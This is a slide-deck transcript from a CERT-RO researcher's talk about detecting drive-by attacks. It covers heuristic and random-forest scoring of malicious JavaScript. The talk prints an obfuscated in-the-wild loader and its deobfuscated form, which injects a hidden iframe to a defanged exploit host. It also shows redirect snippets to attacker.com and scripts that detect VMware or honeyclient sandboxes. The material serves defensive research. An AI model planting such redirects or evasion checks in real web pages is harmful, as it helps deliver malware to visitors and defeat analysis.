Detecting Drive-By Attacks: Analysis of Malicious Javascript in Big Data Environments

Slide Note
Embed
Share

Cybersecurity researcher Andrei Bozeanu delves into the complex world of polymorphic viruses, heuristic analysis, and the similarities between polymorphic viruses and malicious Javascript. Discover how these threats operate and evade detection, highlighting the importance of understanding malware behavior in defending against drive-by attacks.


Uploaded on Sep 24, 2024 | 0 Views


Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

E N D

Presentation Transcript


  1. Detecting Drive-By Attacks by Analyzing Malicious Javascript in Big Data Environments By Andrei Bozeanu

  2. Who am I Cybersecurity Researcher & Consultant for CERT-RO Romanian National Center for Cybersecurity Incidents Response 25 years of information security experience Computer freak, from the days when computers were not yet considered cool and www was just bbs Malware analysis and antimalware one of my first hobbies All started when all my friends, me included, got infected back in 1992 with Hi virus Simple do-nothing virus, appending its 460 bytes code to .COM files There was no antivirus so I had to write it myself Then I found a polymorphic virus..

  3. Polymorphic Virus Every offspring is encrypted using a new key Different looking code means no signature can be extracted The only constant code is the decrypting routine But it s too small to extract a signature Sometimes the decryption routine differs itself from one generation to another But still, there is a way..

  4. Heuristic Analysis Relies on the fact that even though a signature cannot be extracted, a polymorphic virus has certain features (searching for certain files or processes, trying to open certain files and copy itself, etc.) The decryption routine is polymorphic virus s Achilles heel because this portion of code is never encrypted, only obfuscated Basically it is considered suspicious behavior if a process Cycles through large chunks of data Applies transformation on data read Attempts to execute the data

  5. Why do I speak about viruses? Similarities between polymorphic viruses and malicious Javascript Virus needs to encrypt its own body in order to avoid detection by antivirus signature scanning Javascript needs to obfuscate its own code to avoid detection by UTM, antivirus scanners or browser add-ons To achieve memory execution a polymorphic virus has to decrypt its own body: Cycle through the encrypted code Apply transformation to the code Execute the code To infect an user undetected a cloaked Web exploit kit has to do the same

  6. Why do I speak about viruses? What is a Web exploit kit? Toolkit that automates the exploitation of client-side vulnerabilities, usually targeting browsers and programs that a website can invoke through the browser Gathers information on the victim machine, finds vulnerabilities and determines the appropriate exploit, and delivers the exploit, which typically silently drive-by downloads and executes malware More than 70% of ransomware and banking trojans is delivered either by phishing email containing a link to an URL with a malicious Javascript, or when users access an URL containing a malicious Javascript, in a legitimate website, or served by a 3rdparty advertisement. There are four stages during a web drive-by exploitation: Contact phase user accesses a compromised website, accesses a spamlink, or a compromised ad Redirection phase user is redirected to the exploitation server Exploitation phase user is compromised Infection phase various malware, including ransomware and banking Trojans get installed

  7. Exploit Kit Attack Scenario

  8. Why do I speak about viruses? Our focus is to detect attacks in the Contact phase The attacks are performed by inserting malicious redirects (Javascript, meta refresh, iframe, etc.) in the HTML code of the page Javascript: document.location.href= http://www.attacker.com ; Meta refresh: <meta http-equiv= refresh content= 0;url=http://www.attacker.com /> Iframe: <iframe src="http://www.attacker.com/adv.php" height= 0" width= 0"... Signature scanning easily detects malicious redirects Cybercriminals came with a solution: Javascript obfuscation

  9. Obfuscated Javascript How Javascript code would normally look (function() { var b="some sample packed code"; function something(a) { alert(a) } something(b) } )(); How obfuscated Javascript code actually looks eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(0(){4 1="5 6 7 8";0 2(3){9(3)}2(1)})();',10,10,'function|b|something|a|var|some|sample|packed|code|alert'.split('|'),0,{}))

  10. Obfuscated Javascript Real life example of obfuscated Javascript code eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c-- ){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c-- ){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element |yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChi ld|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh| navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  11. Obfuscated Javascript Deobfuscates to function MakeFrameEx(){ element = document.getElementById('yahoo_api'); if (!element){ var el = document.createElement('iframe'); document.body.appendChild(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) }

  12. Obfuscated Javascript Deobfuscates to function MakeFrameEx(){ element = document.getElementById('yahoo_api'); if (!element){ var el = document.createElement('iframe'); document.body.appendChild(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) }

  13. Obfuscated Javascript Extracting the signature becomes an impossible task All redirects are created on the fly, while the HTML code is rendered Malicious behavior can only be determined by emulating the code But this process is time consuming and not always reliable Emulating the code can trigger booby traps

  14. The Challenge CERT-RO wants to continuously monitor the security level of Romanian websites, from the perspective of drive- by attacks. There are over 372,000 websites needing to be monitored and ransomware campaigns are at an all time high We need very small rates of false negative detection, as this leaves Romanian Internet users exposed to attacks We need to be accurate, clean & fast

  15. The Problem(s) We need to analyze number of websites x number of website pages x analysis time = total analysis time 372,000 x 100 x 2 = 20666 hours Add average response time per page ~3 secs: 51666 hours If we were to analyze every page in a honeyclient we should be analyzing continuously for 5.89 years for a single iteration Most websites have more than just one hundred pages and higher response times, therefore the total duration might be longer Most exploit kits use Javascript obfuscation which means signature scanning fails meaning your favorite next generation firewall will not detect them Even if your browser is up-to-date you are still exposed to zero-day attacks

  16. Honeyclient Full-featured web browser to visit potentially malicious web pages The environment in which the browser runs is monitored to determine if the visit resulted in the system being compromised Records all the modifications that occur during the visit of a page, such as files created or deleted, registry keys modified, and processes launched If any unexpected modification occurs, this is considered as the manifestation of an attack, and the corresponding page is flagged as malicious High interaction honeyclient seem to be the solution but it s not They are time consuming (firing a single instance can add 3-4 secs for every URL) They are detectable & defeatable, even from Javascript

  17. Honeyclient Detection Real World Examples Detection of monitoring environment Detection evasion

  18. Detection of Monitoring Environment Virtual machine detection Reading MAC address in Internet Explorer </script language="javascript"> function vmDetect(){ var o = new ActiveXObject("WbemScripting.SWbemLocator"); var s = o.ConnectServer(strServer = "."); var a = s.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration"); var e = new Enumerator(a); var mac = []; var regex = /(00:50:56).*/; //OUI of VMware's dynamically generated MAC address.

  19. Detection of Monitoring Environment for (;!e.atEnd();e.moveNext()){ //Loop over Adapter properties. var x = e.item(); if(x.MACAddress){ mac[mac.length] = x.MACAddress; } } for (var i=0; i<mac.length; i++) { if (mac[i].match(regex)) { alert("ohnes! you're in a virtual machine"); exit(); } } } </script>

  20. Detection of Monitoring Environment The script uses the ConnectServer method of the SWbemLocator object to get the SWbemServices ExecQuery method It queries the Win32_NetworkAdapterConfiguration WMI class to return the properities of the network adapters on the system Simply iterate through the values and alert when it matches VMware OUI

  21. Detection of Monitoring Environment Detecting screen resolution, as most off-the-shelf VM have standard screen resolutions <* input type="button" value="Show screen resolution" onclick="alert('Your resolution is ' + screen.width + 'x' + screen.height);">

  22. Detection of Monitoring Environment Detecting honeyclient searching for specific filenames var script = document.createElement("script") script.type = "text/javascript"; script.src = "res://C:\\Program%20Files\\Capture\\CaptureClient.exe"; script.onreadystatechange= function () { if(this.readyState == "complete") alert("capture-hpc detected!"); }; document.getElementsByTagName("head")[0].appendChild(script);

  23. Detection of Monitoring Environment Request Javascript engine to load a source script from the client s local file system Javascript does not perform any checks to see if the file requested is actually a Javascript source file If the file is not in the expected format it throws a Javascript runtime error This script detects even VMware Tools

  24. Detection Evasion Delayed exploitation Event triggered exploitation (onMouseOver, onmouseout, onClick) Sleep time before exploitation (setTimeOut)

  25. Detection Evasion Selective exploitation User-Agent detection only certain browsers & variants will be exploited Referer attack - exploits are only served to requests originating from one of the infected websites Revisiting not attacking a browser the first time

  26. Why not using an existing solution? Existing solutions make use of honeyclients, but feeding every URL to a honeyclient is very time consuming in these circumstances Publicly available honeyclients have known fingerprints which could lead to detection evasion No publicly available solution can scale to our needs We need to distinguish between benign and malign URLs pre- sandbox analysis

  27. First steps We had to understand the inner works and dynamics of malicious Javascript We analyzed ~40 different malicious Javascript samples found in the wild We found common features shared by malicious Javascripts We were able to compile the heuristics set from extracted features Then we created an AI model using the heuristics set to be used in Anomaly Detection Engine

  28. The Solution: Dekeneas

  29. Dekeneas Malicious JS Detection engine Written in C & assembly language Multi threaded analysis Crawling a list of websites analyzing every script found on every page using heuristic techniques Searching HTML code for suspicious Javascript methods and correlations between them (features) Looking for different evasion techniques inside script code Smart Scoring System the scoring is done contextualizing the code, the same method getting scored differently depending how it is correlated with the rest of the code

  30. Malicious JS Features Silent redirection to the exploit site Obfuscation, in order to evade signature detection of the attack Selective execution, in order to model the attack Delayed execution, in order to deter analysis

  31. Malicious JS Features: Obfuscation Obfuscation is the obscuring of intended meaning in communication, making the message confusing, willfully ambiguous, or harder to understand. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromChar Code(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c-- ){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c-- ){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_ap i|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id| nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator| ai| showthread|php|72241732'.split('|'),0,{}))

  32. Malicious JS Features: Silent redirection function MakeFrameEx(){ element = document.getElementById('yahoo_api'); if (!element){ var el = document.createElement('iframe'); document.body.appendChild(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) }

  33. Malicious JS Features: Checking User-Agent header function MakeFrameEx(){ element = document.getElementById('yahoo_api'); if (!element){ var el = document.createElement('iframe'); document.body.appendChild(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) }

  34. Malicious JS Features: Delayed Execution function MakeFrameEx(){ element = document.getElementById('yahoo_api'); if (!element){ var el = document.createElement('iframe'); document.body.appendChild(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) }

  35. Malicious JS Heuristics: Our Feature Set Signs of obfuscation Cycling features (while, for) Transformation features inside & outside cycles (replace, parseInt, fromCharCode, unescape,etc.) Execution features(eval) Redirection features HTML elements Meta redirect tags Iframe

  36. Malicious JS Heuristics: Our Feature Set Unusually large variable content Unusually large eval content Unusually large unescape content Delayed execution (setTimeOut, onClick, etc.) Occurrence of whitespaces inside script code Signs of concatenation (more than 2 + in close vicinity)

  37. Our AI Model: Benign Javascript Cycling features Transformation features 45 Execution features 0 Whitespaces Concatenation Redirection features 0 Delayed execution 0 Large var content 0 40 7 13 <script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.le ngth;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data- cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(- 2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>

  38. Our AI Model: Malicious Javascript Cycling features Transformation features 110 Execution features 10 Whitespaces Concatenation Redirection features 10 Delayed execution 10 Large var content 0 40 0 2 eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode (c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|heig ht| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|ms ie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  39. Our AI Model: Malicious Javascript Cycling features Transformation features 110 Execution features 10 Whitespaces Concatenation Redirection features 10 Delayed execution 10 Large var content 0 40 0 2 eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStri ng(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  40. Our AI Model: Malicious Javascript Cycling features Transformation features 110 Execution features 10 Whitespaces Concatenation Redirection features 10 Delayed execution 10 Large var content 0 40 0 2 eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStri ng(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  41. Our AI Model: Malicious Javascript Cycling features Transformation features 110 Execution features 10 Whitespaces Concatenation Redirection features 10 Delayed execution 10 Large var content 0 40 0 2 eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStri ng(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  42. Our AI Model: Malicious Javascript Cycling features Transformation features 110 Execution features 10 Whitespaces Concatenation Redirection features 10 Delayed execution 10 Large var content 0 40 0 2 eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStri ng(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  43. Our AI Model: Malicious Javascript Cycling features Transformation features 110 Execution features 10 Whitespaces Concatenation Redirection features 10 Delayed execution 10 Large var content 0 40 0 2 eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStri ng(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

  44. Dekeneas Big Data Processing Starts multiple agents to analyze the web sites list The agent crawls the web site and analyzes every URL found A stream containing the URL name and score for each URL found on a web site is sent to a message broker The message broker sends data streams to the Anomaly Detection engine The Anomaly Detection engine uses a Random Forests machine learning algorithm If Anomaly Detection engine sees an anomaly, the URL who triggered it is sent to the NodeJS and VM sandboxes If Anomaly Detection was triggered and neither sandbox reported suspicious behavior, the HTML page along with the affecting scripts are submitted for manual analysis Outputs results to NoSQL database

  45. Anomaly Detection using Random Forests Random forests are one of the most successful machine learning models for classification and regression They combine many decision trees in order to reduce the risk of overfitting Do not require feature scaling Able to capture non-linearities and feature interactions Random forests train a set of decision trees separately, so the training can be done in parallel The algorithm injects randomness into the training process so that each decision tree is a bit different Combining the predictions from each tree reduces the variance of the predictions, improving the performance on test data.

  46. NodeJS Sandbox Contained environment Static and dynamic analysis of emulated code Feed the de-obfuscated code to Dekeneas Malicious JS Detection Executes Javascript anti-anti-analysis tricks Follow redirections Download the binary Enough signs it was a drive-by attack

  47. VT-x Sandbox Makes use of Intel VT-x technology Each URL is analyzed by multiple VM in parallel Uses custom screen sizes Waits for anomalous behavior longer than 120s Emulates mouse movement and clicks Monitors all system functions, not only some Reports all OS functions accessed Tracks changes for further analysis

  48. Thank You!

Related


More Related Content